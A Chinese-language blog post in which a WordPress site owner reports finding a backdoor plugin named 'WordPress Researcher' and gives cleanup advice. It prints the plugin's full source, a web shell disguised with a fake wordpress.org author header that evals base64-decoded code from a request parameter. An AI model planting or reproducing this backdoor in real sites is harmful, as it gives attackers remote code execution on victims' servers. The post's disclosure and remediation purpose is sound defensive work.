WordPress是世界上最流行的CMS（這應(yīng)該不會引起類似“PHP是最好的語言”的論戰(zhàn)吧？），所以WordPress理所當(dāng)然的會受到黑客的”特別對待“，最近在我管理的幾個WordPress站點(diǎn)上莫名其妙的多了一個插件，插件名稱為“WordPress Researcher”，乍一看名稱，挺正常的一個插件，可仔細(xì)一看源碼，是一個后門插件無疑，源碼如下，非常簡單，卻給我們的WordPress注入了一個后門，果斷刪之！插件源碼文件如下：請各位自行欣賞。

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
 
Copyright 2013 wordpressdotorg
 
 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 
 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 
 You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
 
function research_plugin(){
  if (isset($_REQUEST['CSSl'])){
    eval(base64_decode($_REQUEST['CSSl']));
  } 
  return;
}
 
add_action('after_setup_theme', 'research_plugin');
?>

和WordPress Researcher插件一起安裝的還有“Extend Calendar”這個插件，看代碼也不是什么好貨，一起刪除了，然后修改升級到WordPress版本，修改后臺的密碼，如果不放心，看以把整個網(wǎng)站的代碼下載下來，和之前的備份比對一下，看看還有沒有其他文件被插件修改掉了。